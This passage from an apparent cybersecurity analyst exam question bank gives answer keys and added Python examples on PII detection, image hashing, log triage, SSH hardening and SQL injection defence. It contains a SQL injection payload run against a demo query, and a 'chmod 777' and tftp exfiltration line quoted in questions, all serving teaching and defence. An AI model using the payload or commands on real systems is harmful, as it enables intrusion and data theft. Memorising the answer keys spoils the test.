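    "dlee@example.com 093-45-3748 phone 555-123-4567 ref 1234-56-7890"
)


def find_ssns(text: str) -> list[str]:
    """Return every SSN-shaped token, excluding ones embedded in longer digit runs."""
    return SSN_RE.findall(text)


def find_emails(text: str) -> list[str]:
    return EMAIL_RE.findall(text)


def find_pii(text: str) -> dict[str, list[str]]:
    """Group hits by type so the analyst can report counts per PII category."""
    return {"ssn": find_ssns(text), "email": find_emails(text)}


def mask_ssn(ssn: str) -> str:
    """Redact all but the last four digits, the usual form for an evidence report."""
    return "XXX-XX-" + ssn[-4:]


if __name__ == "__main__":
    hits = find_pii(SAMPLE)
    print(f"{len(hits['ssn'])} SSNs, {len(hits['email'])} e-mail addresses")
    for s in hits["ssn"]:
        print(" ", mask_ssn(s))
    print("broken pattern matches:", BROKEN_SSN_RE.findall(SAMPLE))
```

Run the file directly to see the five masked SSNs and an empty list for the answer key's literal pattern. The negative lookbehind and lookahead keep a 10-digit account number or a phone number from being cut into an SSN-shaped fragment, which matters when the same search is run over a whole drive image.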
Which of the following tools should a cybersecurity analyst use to verify the integrity of a forensic image before and after an investigation? A. strings B. sha1sum C. file D. dd E. gzip
B. sha1sum
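The following is an added example (not part of the question bank) showing what "verify the integrity of a forensic image before and after" means in practice: hash the image at acquisition, record the digest, and recompute it after analysis. The image here is a constructed byte string written to a temporary file; a real acquisition would hash the output of dd or a hardware imager. SHA-1 is used because the exam names sha1sum, with SHA-256 recorded alongside it.

```python
import hashlib
import os
import tempfile

# Added example, not part of the question bank. Hash a forensic image the way
# sha1sum / sha256sum do, record the digests at acquisition time, and re-verify
# later. The image is a constructed byte string written to a temp file.

CHUNK = 1 << 20  # read 1 MiB at a time so multi-GB images fit in memory


def hash_file(path: str, algo: str = "sha1") -> str:
    """Hex digest of a file, identical to the first field printed by sha1sum."""
    h = hashlib.new(algo)
    with open(path, "rb") as f:          # read-only: never open evidence for writing
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def write_sample(data: bytes) -> str:
    """Write constructed image bytes to a temp file and return its path."""
    fd, path = tempfile.mkstemp(suffix=".dd")
    with os.fdopen(fd, "wb") as f:
        f.write(data)
    return path


def acquisition_record(path: str) -> dict[str, str]:
    """What goes on the chain-of-custody form: two digests of the same image."""
    return {"sha1": hash_file(path, "sha1"), "sha256": hash_file(path, "sha256")}


def verify(path: str, record: dict[str, str]) -> bool:
    """True only if every recorded digest still matches the file on disk."""
    return all(hash_file(path, algo) == digest for algo, digest in record.items())


def demo() -> dict[str, bool]:
    """Acquire, verify, then tamper with one byte and verify again."""
    img = write_sample(b"\x00" * 4096 + b"evidence" + b"\xff" * 4096)
    record = acquisition_record(img)
    intact_before = verify(img, record)
    with open(img, "r+b") as f:          # simulate a one-byte change during analysis
        f.seek(4096)
        f.write(b"E")
    intact_after = verify(img, record)
    os.remove(img)
    return {"intact_before": intact_before, "intact_after": intact_after}


if __name__ == "__main__":
    print(demo())
```

The recorded digests belong on the chain-of-custody document, not only in a file next to the image, so that a later mismatch can be shown to be a change to the evidence rather than to the record. Because SHA-1 collisions have been demonstrated, record SHA-256 as well; sha1sum alone satisfies the exam, not a courtroom.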
A cybersecurity analyst is preparing to run an nmap scan of a targeted network. The analyst wants to perform a quick scan but knows that a SYN scan won't be effective because she doesn't have raw socket privileges on her scanning system. Which flag should the analyst use to conduct the scan? A. -sS B. -O C. -sT D. -sX
C. -sT
While performing a vulnerability scan, Christina discovered an administrative interface to a storage system is exposed to the internet. She looks through the firewall logs and attempts to determine whether any access attempts have occurred from external sources. Which of the following IP addresses in the firewall logs would indicate a connection attempt from an external source? A. 172.16.1.100 B. 192.168.1.100 C. 192.186.1.100 D. 10.15.1.100
C. 192.186.1.100
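The following is an added example (not part of the question bank) that codifies the check behind this question: classify each source address in the firewall log as private, loopback, link-local or external using the standard library, rather than eyeballing octets, which is exactly how 192.186 gets misread as 192.168. The log lines and the 10.0.5.9 admin interface are constructed.

```python
import ipaddress

# Added example, not part of the question bank. Classify source addresses from
# firewall logs so that hits from outside the organisation stand out.
# Assumption: only RFC 1918 space is used internally (the three ranges the
# distractor options come from).


def classify(addr: str) -> str:
    ip = ipaddress.ip_address(addr)
    if ip.is_loopback:
        return "loopback"
    if ip.is_link_local:
        return "link-local"
    if ip.is_private:           # RFC 1918 for IPv4, plus other non-routable blocks
        return "private"
    if ip.is_global:
        return "external"
    return "reserved"            # e.g. carrier-grade NAT: neither private nor global


# Constructed firewall log: "<action> <proto> <src>:<sport> -> <dst>:<dport>".
# 10.0.5.9 stands in for the storage system's exposed admin interface.
FIREWALL_LOG = """\
ACCEPT TCP 172.16.1.100:51002 -> 10.0.5.9:443
ACCEPT TCP 192.168.1.100:49211 -> 10.0.5.9:443
DROP   TCP 192.186.1.100:60231 -> 10.0.5.9:443
ACCEPT TCP 10.15.1.100:51877 -> 10.0.5.9:443
ACCEPT TCP 192.186.1.100:60240 -> 10.0.5.9:443
"""


def parse_sources(log: str) -> list[str]:
    """Pull the source IP (third field, before the port) from each log line."""
    sources = []
    for line in log.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        sources.append(fields[2].rsplit(":", 1)[0])
    return sources


def external_sources(log: str) -> list[str]:
    """Distinct external source addresses, in first-seen order."""
    seen: dict[str, None] = {}
    for src in parse_sources(log):
        if classify(src) == "external":
            seen.setdefault(src, None)
    return list(seen)


if __name__ == "__main__":
    for src in parse_sources(FIREWALL_LOG):
        print(f"{src:16} {classify(src)}")
    print("external:", external_sources(FIREWALL_LOG))
```

Note that the ACCEPT on the last line is the finding that matters: the external host was not only probing, it got through. Whether the destination is reachable from the Internet at all is a separate question, answered by the firewall policy rather than the log.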
A red team actor observes it is common practice to allow cell phones to charge on company computers, but access to the memory storage is blocked. Which of the following are common attack techniques that take advantage of this practice? (Choose two.) A. A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes) B. A USB attack that turns the connected device into a rogue access point that spoofs the configured wireless SSIDs C. A Bluetooth attack that modifies the device registry (Windows PCs only) to allow the flash drive to mount, and then launches a Java applet attack D. A Bluetooth peering attack called "Snarfing" that allows Bluetooth connections on blocked device types if physically connected to a USB port E. A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking
A. A USB attack that tricks the computer into thinking the connected device is a keyboard, and then sends characters one at a time as a keyboard to launch the attack (a prerecorded series of keystrokes) E. A USB attack that tricks the system into thinking it is a network adapter, then runs a user password hash gathering utility for offline password cracking (Both exploit the fact that blocking USB mass storage does not block other USB device classes; a charging phone can present itself as a HID keyboard or as an Ethernet adapter. The Bluetooth options do not depend on the USB charging practice at all.)
A recent vulnerability scan found four vulnerabilities on an organization's public Internet-facing IP addresses. Prioritizing in order to reduce the risk of a breach to the organization, which of the following should be remediated FIRST? A. A cipher that is known to be cryptographically weak. B. A website using a self-signed SSL certificate. C. A buffer overflow that allows remote code execution. D. An HTTP response that reveals an internal IP address.
C. A buffer overflow that allows remote code execution
A recent vulnerability scan found several vulnerabilities on an organization's public-facing IP addresses. In order to reduce the risk of a breach, which of the following vulnerabilities should be prioritized first for remediation? A. An HTTP response that reveals an internal IP address B. A website utilizing a self-signed SSL certificate C. A buffer overflow that is known to allow remote code execution D. A cryptographically weak encryption cipher
C. A buffer overflow that is known to allow remote code execution
Given the following access log: (see image Q-120) Which of the following accurately describes what this log displays? A. A vulnerability in jQuery B. Application integration with an externally hosted database C. A vulnerability scan performed from the Internet D. A vulnerability in Javascript
C. A vulnerability scan performed from the internet
A threat intelligence analyst who works for a technology firm received this report from a vendor. "There has been an intellectual property theft campaign executed against organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector." Which of the following combinations suggests how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity? A. Polymorphic malware and secure code analysis B. Insider threat and indicator analysis C. APT and behavioral analysis D. Ransomware and encryption
C. APT and behavioral analysis
A database administrator contacts a security administrator to request firewall changes for a connection to a new internal application. The security administrator notices that the new application uses a port typically monopolized by a virus. The security administrator denies the request and suggests a new port or service be used to complete the application's task. Which of the following is the security administrator practicing in this example? A. Explicit deny B. Port security C. Access control lists D. Implicit deny
C. Access control lists
A SIEM analyst noticed a spike in activities from the guest wireless network to several electronic health record (EHR) systems. After further analysis, the analyst discovered that a large volume of data has been uploaded to a cloud provider in the last six months. Which of the following actions should the analyst do FIRST? A. Contact the Office of Civil Rights (OCR) to report the breach B. Notify the Chief Privacy Officer (CPO) C. Activate the incident response plan D. Put an ACL on the gateway router
C. Activate the incident response plan
File integrity monitoring states the following files have been changed without a written request or approved change. The following change has been made: chmod 777 -Rv /usr Which of the following may be occurring? A. The ownership of /usr has been changed to the current user. B. Administrative functions have been locked from users. C. Administrative commands have been made world readable/writable. D. The ownership of /usr has been changed to the root user.
C. Administrative commands have been made world readable/writable
What SDLC model emphasizes individuals and interactions over processes and tools, customer collaboration over contract negotiation, and working software over comprehensive documentation? A. RAD B. Waterfall C. Agile D. Spiral
C. Agile
Which of the following stakeholders would need to be aware of an e-discovery notice received by the security office about an ongoing case within the manufacturing department? A. Board of trustees B. Human resources C. Legal D. Marketing
C. Legal
A security analyst has noticed an alert from the SIEM. A workstation is repeatedly trying to connect to port 445 of a file server on the production network. All of the attempts are made with invalid credentials. Which of the following describes what is occurring? A. Malware has infected the workstation and is beaconing out to the specific IP address of the file server. B. The file server is attempting to transfer malware to the workstation via SMB. C. An attacker has gained control of the workstation and is attempting to pivot to the file server by creating an SMB session. D. An attacker has gained control of the workstation and is port scanning the network.
C. An attacker has gained control of the workstation and is attempting to pivot to the file server by creating an SMB session
A security analyst is reviewing packet captures for a specific server that is suspected of containing malware and discovers the following packets: (see image Q-218) Which of the following traffic patterns or data would be MOST concerning to the security analyst? A. Port used for SMTP traffic from 73.252.34.101 B. Unencrypted password sent from 103.34.243.12 C. Anonymous access granted by 103.34.243.12 D. Ports used for HTTP traffic from 202.53.245.78
C. Anonymous access granted by 103.34.243.12
Your organization recently suffered a large-scale data breach. The hackers successfully exfiltrated the personal information and social security numbers of your customers from your network. The CEO notified law enforcement about the breach and they are going to assist with the investigation and conduct evidence collection so that the hackers can be brought up on charges. What actions should your organization take in response to this event? A. Require all employees to commit to an NDA about the data breach verbally B. Require all employees to commit to an NDA about the data breach in writing C. Ask a member of law enforcement to meet with your employees D. Block all employees access to social media from the company's network and begin monitoring your employee's email
C. Ask a member of law enforcement to meet with your employees
Which of the following techniques listed below are not appropriate to use during a passive reconnaissance exercise against a specific target company? A. WHOIS lookups B. Registrar checks C. Banner grabbing D. BGP looking glass usage
C. Banner grabbing
What two techniques are commonly used by port and vulnerability scanners to identify the services running on a target system? A. Using the -O option in nmap and UDP response timing B. Banner grabbing and UDP response timing C. Banner grabbing and comparing response fingerprints D. Comparing response fingerprints and registry scanning
C. Banner grabbing and comparing response fingerprints
What technology is NOT PKI X.509 compliant and cannot be used in a variety of secure functions? A. SSL/TLS B. PKCS C. Blowfish D. AES
C. Blowfish
Which of the following provides a standard nomenclature for describing security-related software flaws? A. SOX B. SIEM C. CVE D. VPC
C. CVE
What sanitization technique uses only logical techniques to remove data, such as overwriting a hard drive with a random series of ones and zeroes? A. Purge B. Degauss C. Clear D. Destroy
C. Clear
A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research and implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement? A. Self-service password reset B. Single sign-on C. Context-based authentication D. Password complexity
C. Context-based authentication
The security configuration management policy states that all patches must undergo testing procedures before being moved into production. The security analyst notices a single web application server has been downloading and applying patches during non-business hours without testing. There are no apparent adverse reactions, server functionality does not seem to be affected, and no malware was found after a scan. Which of the following actions should the analyst take? A. Reschedule the automated patching to occur during business hours. B. Monitor the web application service for abnormal bandwidth consumption. C. Create an incident ticket for anomalous activity. D. Monitor the web application for service interruptions caused from the patching.
C. Create an incident ticket for anomalous activity
What is NOT a means of improving data validation and trust? A. Encrypting data in transit B. Using MD5 checksums for files C. Decrypting data at rest D. Implementing Tripwire
C. Decrypting data at rest
You are a cybersecurity analyst and your company has just enabled key-based authentication on its SSH server. Review the following log file:
BEGIN LOG
Sep 09 13:15:24 diontraining sshd[3423]: Failed password for root from 192.168.3.2 port 45273 ssh2
Sep 09 15:43:15 diontraining sshd[3542]: Failed password for root from 192.168.2.24 port 43543 ssh2
Sep 09 15:43:24 diontraining sshd[3544]: Failed password for jdion from 192.168.2.24 port 43589 ssh2
Sep 09 15:43:31 diontraining sshd[3546]: Failed password for tmartinez from 192.168.2.24 port 43619 ssh2
Sep 09 15:43:31 diontraining sshd[3546]: Failed password for jdion from 192.168.2.24 port 43631 ssh2
Sep 09 15:43:37 diontraining sshd[3548]: Failed password for root from 192.168.2.24 port 43657 ssh2
END LOG
Which of the following actions should be performed to secure the SSH server? A. Disable anonymous SSH logon B. Disable SSHv1 C. Disable password authentication for SSH D. Disable remote root SSH logons
C. Disable password authentication for SSH
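The following is an added example (not part of the question bank) that parses the log above, counts failures per source and per targeted account, and maps the findings to sshd_config directives. The log is a constructed copy of the entries in the question; the brute-force threshold of three failures is an assumed policy value.

```python
import re
from collections import Counter, defaultdict

# Added example, not part of the question bank. Parse sshd "Failed password"
# entries, count attempts per source and per targeted account, and turn the
# findings into sshd_config directives. LOG is a constructed copy of the
# entries in the question.

LOG = """\
Sep 09 13:15:24 diontraining sshd[3423]: Failed password for root from 192.168.3.2 port 45273 ssh2
Sep 09 15:43:15 diontraining sshd[3542]: Failed password for root from 192.168.2.24 port 43543 ssh2
Sep 09 15:43:24 diontraining sshd[3544]: Failed password for jdion from 192.168.2.24 port 43589 ssh2
Sep 09 15:43:31 diontraining sshd[3546]: Failed password for tmartinez from 192.168.2.24 port 43619 ssh2
Sep 09 15:43:31 diontraining sshd[3546]: Failed password for jdion from 192.168.2.24 port 43631 ssh2
Sep 09 15:43:37 diontraining sshd[3548]: Failed password for root from 192.168.2.24 port 43657 ssh2
"""

# "invalid user" appears when the account does not exist; it is optional here so
# both forms of the message are counted.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_failures(log: str) -> list[dict[str, str]]:
    hits = []
    for line in log.splitlines():
        m = FAILED_RE.match(line)
        if m:
            hits.append(m.groupdict())
    return hits


def failures_by_source(log: str) -> dict[str, int]:
    return dict(Counter(h["ip"] for h in parse_failures(log)))


def accounts_by_source(log: str) -> dict[str, dict[str, int]]:
    table: dict[str, Counter] = defaultdict(Counter)
    for h in parse_failures(log):
        table[h["ip"]][h["user"]] += 1
    return {ip: dict(c) for ip, c in table.items()}


def brute_force_sources(log: str, threshold: int = 3) -> list[str]:
    """Sources with at least `threshold` failures (threshold is an assumed policy value)."""
    return [ip for ip, n in failures_by_source(log).items() if n >= threshold]


def recommend(log: str) -> list[str]:
    """sshd_config lines that remove the attack surface the log shows."""
    hits = parse_failures(log)
    lines = []
    if hits:
        # Keys are already rolled out, so password guessing can be made impossible
        # instead of merely rate-limited.
        lines += ["PasswordAuthentication no", "PubkeyAuthentication yes"]
    if any(h["user"] == "root" for h in hits):
        lines.append("PermitRootLogin no")
    return lines


if __name__ == "__main__":
    print(accounts_by_source(LOG))
    print("brute force from:", brute_force_sources(LOG))
    print("\n".join(recommend(LOG)))
```

Disabling password authentication is the answer because it turns every line in that log into a non-event; disabling root login alone would leave jdion and tmartinez exposed to the same guessing. Both directives together are the normal hardening, and after changing sshd_config the daemon must be reloaded and a second session tested with a key before the first one is closed.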
During a routine network scan, a security administrator discovered an unidentified service running on a new embedded and unmanaged HVAC controller, which is used to monitor the company's datacenter:
Port State
161/UDP open
162/UDP open
163/UDP open
The enterprise monitoring service requires SNMP and SNMPTRAP connectivity to operate. Which of the following should the security administrator implement to harden the system? A. Patch and restart the unknown service. B. Segment and firewall the controller's network. C. Disable the unidentified service on the controller. D. Implement SNMPv3 to secure communication. E. Disable TCP/UDP ports 161 through 163.
C. Disable the unidentified service on the controller
A technician receives a report that a user's workstation is experiencing no network connectivity. The technician investigates and notices the patch cable running to the back of the user's VoIP phone is routed directly under the rolling chair and has been smashed flat over time. Which of the following is the most likely cause of this issue? A. Cross-talk B. Electromagnetic interference C. Excessive collisions D. Split pairs
C. Excessive collisions
Weeks before a proposed merger is scheduled for completion, a security analyst has noticed unusual traffic patterns on a file server that contains financial information. Routine scans are not detecting the signature of any known exploits or malware. The following entry is seen in the ftp server logs: tftp -i 10.1.1.1 GET fourthquarterreport.xls Which of the following is the BEST course of action? A. Continue to monitor the situation using tools to scan for known exploits. B. Implement an ACL on the perimeter firewall to prevent data exfiltration. C. Follow the incident response procedure associated with the loss of business critical data. D. Determine if any credit card information is contained on the server containing the financials.
C. Follow the incident response procedure associated with the loss of business critical data
A software assurance test analyst is performing a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to cause an error or failure condition. Which technique is the analyst utilizing? A. Sequential data sets B. Static code analysis C. Fuzzing D. Known bad data injection
C. Fuzzing
A company wants to update its acceptable use policy (AUP) to ensure it relates to the newly implemented password standard, which requires sponsored authentication of guest wireless devices. Which of the following is MOST likely to be incorporated in the AUP? A. Sponsored guest passwords must be at least ten characters in length and contain a symbol. B. The corporate network should have a wireless infrastructure that uses open authentication standards. C. Guests using the wireless network should provide valid identification when registering their wireless devices. D. The network should authenticate all guest users using 802.1x backed by a RADIUS or LDAP server.
C. Guests using the wireless network should provide valid identification when registering their wireless devices
A technician needs to collect a forensic disk image and ensure that they do not change the contents of the drive during the collection of the image. What tools should the technician use? A. Degausser B. Software write blocker C. Hardware write blocker D. Drive duplicator
C. Hardware write blocker
A network technician is concerned that an attacker is attempting to penetrate the network, and wants to set a rule on the firewall to prevent the attacker from learning which IP addresses are valid on the network. Which of the following protocols needs to be denied? A. TCP B. SMTP C. ICMP D. ARP
C. ICMP
A software development company in the manufacturing sector has just completed the alpha version of its flagship application. The application has been under development for the past three years. The SOC has seen intrusion attempts made by indicators associated with a particular APT. The company has a hot site location for COOP. Which of the following threats would most likely incur the BIGGEST economic impact for the company? A. DDoS B. ICS destruction C. IP theft D. IPS evasion
C. IP Theft
While reviewing proxy logs, the security analyst noticed a suspicious traffic pattern. Several internal hosts were observed communicating with an external IP address over port 80 constantly. An incident was declared, and an investigation was launched. After interviewing the affected users, the analyst determined the activity started right after deploying a new graphic design suite. Based on this information, which of the following actions would be the appropriate NEXT step in the investigation? A. Update all antivirus and anti-malware products, as well as all other host-based security software on the servers the affected users authenticate to. B. Perform a network scan and identify rogue devices that may be generating the observed traffic. Remove those devices from the network. C. Identify what the destination IP address is and who owns it, and look at running processes on the affected hosts to determine if the activity is malicious or not. D. Ask desktop support personnel to reimage all affected workstations and reinstall the graphic design suite. Run a virus scan to identify if any viruses are present.
C. Identify what the destination IP address is and who owns it, and look at the running processes on the affected hosts to determine if the activity is malicious or not
A recent audit included a vulnerability scan that found critical patches released 60 days prior were not applied to servers in the environment. The infrastructure team was able to isolate the issue and determined it was due to a service being disabled on the server running the automated patch management application. Which of the following would be the MOST efficient way to avoid similar audit findings in the future? A. Implement a manual patch management application package to regain greater control over the process. B. Create a patch management policy that requires all servers to be patched within 30 days of patch release. C. Implement service monitoring to validate that tools are functioning properly. D. Set services on the patch management server to automatically run on start-up.
C. Implement service monitoring to validate that tools are functioning properly
A cybersecurity analyst has received a report that multiple systems are experiencing slowness as a result of a DDoS attack. Which of the following would be the BEST action for the cybersecurity analyst to perform? A. Continue monitoring critical systems. B. Shut down all server interfaces. C. Inform management of the incident. D. Inform users regarding the affected systems.
C. Inform management of the incident
A web application has a newly discovered vulnerability in the authentication method used to validate known company users. The user ID of Admin with a password of "password" grants elevated access to the application over the Internet. Which of the following is the BEST method to discover the vulnerability before a production deployment? A. Manual peer review B. User acceptance testing C. Input validation D. Stress test the application
C. Input validation
During a web application vulnerability scan, it was discovered that the application would display inappropriate data after certain key phrases were entered into a webform connected to a SQL database server. Which of the following should be used to reduce the likelihood of this type of attack returning sensitive data? A. Static code analysis B. Peer review code C. Input validation D. Application fuzzing
C. Input validation
Which of the following secure coding best practices ensures special characters like <, >, /, and ' are not accepted from the user via a web form? A. Error handling B. Output encoding C. Input validation D. Session management
C. Input validation
A zero-day crypto-worm is quickly spreading through the internal network on port 25 and exploiting a software vulnerability found within the email servers. Which of the following countermeasures needs to be implemented as soon as possible to mitigate the worm from continuing to spread? A. Implement a traffic sinkhole. B. Block all known port/services. C. Isolate impacted servers. D. Patch affected systems.
C. Isolate impacted servers
Which containment technique is the strongest possible response to an incident? A. Segmentation B. Isolating the attacker C. Isolating affected systems D. Enumeration
C. Isolating affected systems
A security analyst is concerned that unauthorized users can access confidential data stored in the production server environment. All workstations on a particular network segment have full access to any server in production. Which of the following should be deployed in the production environment to prevent unauthorized access? (Choose two.) A. DLP system B. Honeypot C. Jump box D. IPS E. Firewall
C. Jump box E. Firewall
Which of the following technologies is NOT a shared authentication protocol? A. Facebook Connect B. OAuth C. LDAP D. OpenID Connect
C. LDAP
Organizational policies require vulnerability remediation on severity 7 or greater within one week. Anything with a severity less than 7 must be remediated within 30 days. The organization also requires security teams to investigate the details of a vulnerability before performing any remediation. If the investigation determines the finding is a false positive, no remediation is performed and the vulnerability scanner configuration is updated to omit the false positive from future scans. The organization has three Apache web servers:
192.168.1.20 - Apache v2.4.1
192.168.1.21 - Apache v2.4.0
192.168.1.22 - Apache v2.4.0
The results of a recent vulnerability scan are shown below: (see image Q-211) The team performs some investigation and finds a statement from Apache: "Fixed in Apache HTTP server 2.4.1 and later" Which of the following actions should the security team perform? A. Ignore the false positive on 192.168.1.22 B. Remediate 192.168.1.20 within 30 days C. Remediate 192.168.1.22 within 30 days D. Investigate the false negative on 192.168.1.20
C. Remediate 192.168.1.22 within 30 days
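The following is an added example (not part of the question bank) that encodes the triage rule from this question: compare each installed version against the vendor's "fixed in" version and assign the policy deadline from the severity. The scan image is not on the page, so the severity is an assumed value below 7, consistent with the 30-day deadline in the answer; the example also flags 192.168.1.21, which runs the same 2.4.0 build as .22 and should be checked regardless of what the scanner reported.

```python
import re

# Added example, not part of the question bank. Decide per server whether the
# scanner's Apache finding is real, using the vendor statement "Fixed in Apache
# HTTP server 2.4.1 and later" and the SLAs from the question. ASSUMED_SEVERITY
# is an assumption: the scan image is not on the page, and the answer key's
# 30-day deadline implies a score below 7.

FIXED_IN = "2.4.1"
SERVERS = {"192.168.1.20": "2.4.1", "192.168.1.21": "2.4.0", "192.168.1.22": "2.4.0"}
ASSUMED_SEVERITY = 5.0


def parse_version(v: str) -> tuple[int, ...]:
    """'2.4.10' -> (2, 4, 10). Tuple comparison orders 2.4.10 above 2.4.9,
    which a plain string comparison gets wrong. Trailing suffixes such as
    '-beta' are ignored."""
    parts = []
    for part in v.split("."):
        m = re.match(r"\d+", part)
        if not m:
            break
        parts.append(int(m.group()))
    return tuple(parts)


def is_affected(installed: str, fixed_in: str) -> bool:
    """'Fixed in X and later' means anything strictly below X is vulnerable."""
    return parse_version(installed) < parse_version(fixed_in)


def sla_days(severity: float) -> int:
    return 7 if severity >= 7 else 30


def triage(servers: dict[str, str], fixed_in: str = FIXED_IN,
           severity: float = ASSUMED_SEVERITY) -> dict[str, str]:
    out = {}
    for ip, installed in servers.items():
        if is_affected(installed, fixed_in):
            out[ip] = f"remediate within {sla_days(severity)} days"
        else:
            out[ip] = "false positive: exclude from future scans"
    return out


if __name__ == "__main__":
    for ip, verdict in triage(SERVERS).items():
        print(f"{ip:14} Apache {SERVERS[ip]:6} -> {verdict}")
```

One caveat before excluding anything from future scans: distribution packages routinely backport fixes without changing the upstream version string, so a version-only comparison can also produce false positives in the other direction. Confirm against the package changelog or a test for the behaviour itself before closing the finding.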
A new zero-day vulnerability was discovered within a basic screen capture app, which is used throughout the environment. Two days after discovering the vulnerability, the manufacturer of the software has not announced a remediation or if there will be a fix for this newly discovered vulnerability. The vulnerable application is not uniquely critical, but it is used occasionally by the management and executive management teams. The vulnerability allows remote code execution to gain privileged access to the system. Which of the following is the BEST course of action to mitigate this threat? A. Work with the manufacturer to determine the time frame for the fix. B. Block the vulnerable application traffic at the firewall and disable the application services on each computer. C. Remove the application and replace it with a similar non-vulnerable application. D. Communicate with the end users that the application should not be used until the manufacturer has resolved the vulnerability.
C. Remove the application and replace it with a similar non-vulnerable application
Which of the following methods could not be used to retrieve the key from a forensic copy of a BitLocker encrypted drive? A. Analyzing the hibernation file B. Analyzing the memory dump file C. Retrieving the key from the MBR D. Performing a FireWire attack on mounted drives
C. Retrieving the key from the MBR
What is the term for the amount of risk that an organization is willing to accept or tolerate? A. Risk deterrence B. Risk transference C. Risk appetite D. Risk avoidance
C. Risk appetite
A company that is hiring a penetration tester wants to exclude social engineering from the list of authorized activities. Which of the following documents should include these details? A. Acceptable use policy B. Service level agreement C. Rules of engagement D. Memorandum of understanding E. Master service agreement
C. Rules of Engagement
While preparing for a third-party audit, the vice president of risk management and the vice president of information technology have stipulated that the vendor may not use offensive software during the audit. This is an example of: A. organizational control. B. service-level agreement. C. rules of engagement. D. risk appetite
C. Rules of engagement
A retail corporation with widely distributed store locations and IP space must meet PCI requirements relating to vulnerability scanning. The organization plans to outsource this function to a third party to reduce costs. Which of the following should be used to communicate expectations related to the execution of scans? A. Vulnerability assessment report B. Lessons learned documentation C. SLA D. MOU
C. SLA
Which protocol is commonly used to collect information about CPU utilization and memory usage from network devices? A. SMTP B. MIB C. SNMP D. Netflow
C. SNMP
A security analyst is reviewing IDS logs and notices the following entry: (where [email protected] and password=' or 20==20') Which of the following attacks is occurring? A. Cross-site scripting B. Header manipulation C. SQL injection D. XML injection
C. SQL Injection
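The following is an added example (not part of the question bank) that reproduces the IDS entry's payload against a string-built login query and then shows the two controls the earlier input-validation questions point at: a parameterised query as the primary fix and an allow-list check on the e-mail field as defence in depth. The user table is constructed; SQLite is used because, like the payload, it accepts `==` as the equality operator. The trailing `--` on the payload is an assumption added so the injected statement parses; the page shows only `' or 20==20`.

```python
import re
import sqlite3

# Added example, not part of the question bank. Reproduce the IDS entry's
# payload against a string-built query, then show the two controls that stop
# it. The user table is constructed. The trailing comment on PAYLOAD is an
# assumption so that the spliced statement still parses.

PAYLOAD = "' or 20==20 --"
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (email TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice@example.com", "s3cret"), ("admin@example.com", "hunter2")],
    )
    conn.commit()
    return conn


def build_query(email: str, password: str) -> str:
    """The statement the vulnerable code runs; useful for correlating with the IDS log."""
    return f"SELECT email FROM users WHERE email='{email}' AND password='{password}'"


def login_vulnerable(conn: sqlite3.Connection, email: str, password: str) -> list[str]:
    # Attacker text is spliced straight into SQL. With PAYLOAD the WHERE clause
    # becomes (email=... AND password='') OR 20==20, which is true for every row.
    return [row[0] for row in conn.execute(build_query(email, password))]


def login_parameterised(conn: sqlite3.Connection, email: str, password: str) -> list[str]:
    # Placeholders send the values out of band; the quote in PAYLOAD is just data.
    sql = "SELECT email FROM users WHERE email=? AND password=?"
    return [row[0] for row in conn.execute(sql, (email, password))]


def valid_email(value: str) -> bool:
    """Allow-list check: rejects <, >, /, ' and anything else outside the e-mail shape."""
    return EMAIL_RE.fullmatch(value) is not None


def login_hardened(conn: sqlite3.Connection, email: str, password: str) -> list[str]:
    """Validate the field that has a known shape, then parameterise everything."""
    if not valid_email(email):
        raise ValueError("rejected e-mail field")
    return login_parameterised(conn, email, password)


if __name__ == "__main__":
    db = make_db()
    print(build_query("victim@example.com", PAYLOAD))
    print("vulnerable   :", login_vulnerable(db, "victim@example.com", PAYLOAD))
    print("parameterised:", login_parameterised(db, "victim@example.com", PAYLOAD))
```

The password field is deliberately not allow-listed: users may legitimately use quotes and angle brackets in passwords, so validation cannot be the only control there. That is why parameterisation is the primary fix and input validation is the layer in front of it, which matches the ordering in the three "input validation" questions above.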
Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Choose two.) A. Patching B. NIDS C. Segmentation D. Disabling unused services E. Firewalling
C. Segmentation D. Disabling unused services
Three similar production servers underwent a vulnerability scan. The scan results revealed that the three servers had two different vulnerabilities rated "Critical". The administrator observed the following about the three servers:
- The servers are not accessible by the Internet
- AV programs indicate the servers have had malware as recently as two weeks ago
- The SIEM shows unusual traffic in the last 20 days
- Integrity validation of system files indicates unauthorized modifications
Which of the following assessments is valid and what is the most appropriate NEXT step? (Choose two.) A. Servers may have been built inconsistently B. Servers may be generating false positives via the SIEM C. Servers may have been tampered with D. Activate the incident response plan E. Immediately rebuild servers from known good configurations F. Schedule recurring vulnerability scans on the servers
C. Servers may have been tampered with D. Activate the incident response plan
Which of the following does a User Agent request a resource from when conducting a SAML transaction? A. Single-sign-on (SSO) B. Identity provider (IdP) C. Service provider (SP) D. Relying party (RP)
C. Service provider (SP)
Which of the following has the GREATEST impact to the data retention policies of an organization? A. The CIA classification matrix assigned to each piece of data B. The level of sensitivity of the data established by the data owner C. The regulatory requirements concerning the data set D. The technical constraints of the technology used to store the data
C. The regulatory requirements concerning the data set
What does "bs" do when using the dd command in Linux, UNIX, or OS X? A. Sends the output to a blank sector B. Sets the beginning sector of the drive image C. Sets the block size D. Removes error messages and other error data from the image
